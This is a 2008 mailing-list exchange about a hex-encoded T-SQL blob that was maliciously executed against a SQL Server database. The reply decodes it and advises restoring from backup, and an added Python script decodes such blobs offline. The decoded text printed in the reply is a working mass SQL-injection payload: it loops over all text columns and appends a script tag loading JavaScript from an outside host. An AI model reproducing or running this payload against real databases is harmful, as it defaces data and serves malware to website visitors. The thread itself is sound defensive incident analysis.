
Re: Urgent: Deciphering binary code executed against the database

by Matthias Klaey <mpky@[EMAIL PROTECTED] > May 13, 2008 at 02:31 AM

anojjona@[EMAIL PROTECTED] wrote:

> Hi,
>   I need to figure out what some code that was maliciously executed
> against a database does.  However, it's in a very strange format.  It
> simply declares a variable and sets it equal to a huge binary thing
> (seems to be some sort of compiled code) cast as nvarchar.  It then
> executes this variable.
>    Is there any way to decipher or decompile this code?  Does anyone
> have information either on what SQL Server does when it's asked to
> execute a binary string (as opposed to regular T-SQL) and any tools
> that can be used to disassemble or understand this code?
>    Thanks!
> 
>    Here's the code:
> 
> DECLARE @[EMAIL PROTECTED] NVARCHAR(4000);
> SET @[EMAIL PROTECTED](0x44004

[...]

> EXEC(@[EMAIL PROTECTED]);

Hi

Copy the code into a query window for a test database, then instead of
the EXEC(@[EMAIL PROTECTED]) just simply do a

 SELECT @[EMAIL PROTECTED]

 look at the result. Here is what I got:

DECLARE @[EMAIL PROTECTED] varchar(255),@[EMAIL PROTECTED] varchar(255)
DECLARE Table_Cursor CURSOR FOR select a.name,b.name
  from sysobjects a,syscolumns b
  where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or
b.xtype=231 or b.xtype=167)

OPEN Table_Cursor
  FETCH NEXT FROM  Table_Cursor INTO @[EMAIL PROTECTED]
  WHILE(@[EMAIL PROTECTED])
    BEGIN
      exec('update ['+@[EMAIL PROTECTED]']
            set ['+@[EMAIL PROTECTED]']=rtrim(convert(varchar,['+@[EMAIL PROTECTED]']))+''
            <script src=http://www.killwow1.cn/g.js></script>''')
      FETCH NEXT FROM  Table_Cursor INTO @[EMAIL PROTECTED]
    END CLOSE Table_Cursor
DEALLOCATE Table_Cursor

I'm not good enough to understand what this really does, and a lot
will depend on what is coming down the line from the web site.

But I think you got yourself something nasty, and I would ASAP kill
this DB and restore from a clean backup.

HTH
Matthias Kläy
-- 
www.kcc.ch
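
The SELECT-instead-of-EXEC step in the reply above can also be done away from any SQL Server, because the hex literal cast to NVARCHAR is simply the UTF-16LE bytes of the T-SQL text. The sketch below is an added example, not part of the original post; the sample statement, the variable names @s and @t and the example.invalid URL are constructed for illustration.

```python
import re

# CAST(0x<hex> AS NVARCHAR(...)) wrapper as in the post; the type part is
# optional so that a statement truncated in a log still yields its hex digits.
CAST_RE = re.compile(r"CAST\s*\(\s*0x([0-9A-Fa-f]+)(?:\s+AS\s+(N?VARCHAR))?", re.I)
SCRIPT_RE = re.compile(r"<script[^>]*\bsrc\s*=\s*[\"']?([^\s\"'>]+)", re.I)
CATALOG_RE = re.compile(r"sysobjects|syscolumns", re.I)
EXEC_RE = re.compile(r"\bexec\s*\(", re.I)

def decode_hex_literal(hex_digits, wide=True):
    """Turn the digits after 0x into text; NVARCHAR data is UTF-16LE."""
    hex_digits = hex_digits[: len(hex_digits) - len(hex_digits) % 2]  # truncated capture
    raw = bytes.fromhex(hex_digits)
    if wide:
        raw = raw[: len(raw) - len(raw) % 2]  # drop a dangling half code unit
        return raw.decode("utf-16-le", errors="replace")
    return raw.decode("latin-1")

def analyze(statement):
    """Decode every CAST(0x...) blob in a captured statement without executing it."""
    findings = []
    for m in CAST_RE.finditer(statement):
        wide = (m.group(2) or "NVARCHAR").upper().startswith("N")
        text = decode_hex_literal(m.group(1), wide)
        findings.append({
            "decoded": text,
            "script_urls": SCRIPT_RE.findall(text),      # tags appended to column data
            "walks_catalog": bool(CATALOG_RE.search(text)),
            "dynamic_exec": bool(EXEC_RE.search(text)),
        })
    return findings

# Constructed sample: a harmless stand-in with the same shape as the payload in
# the post. @s, @t and the example.invalid URL are made up for this demonstration.
SAMPLE_PLAINTEXT = (
    "DECLARE @t varchar(255) "
    "select a.name from sysobjects a,syscolumns b where a.id=b.id "
    "exec('print ''<script src=http://example.invalid/g.js></script>''')"
)
SAMPLE_STATEMENT = (
    "DECLARE @s NVARCHAR(4000);SET @s=CAST(0x"
    + SAMPLE_PLAINTEXT.encode("utf-16-le").hex().upper()
    + " AS NVARCHAR(4000));EXEC(@s);"
)

if __name__ == "__main__":
    print(analyze(SAMPLE_STATEMENT))
```

The decoded text and the extracted script URLs can then be searched for in web server logs and in the text columns of the affected tables.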
 



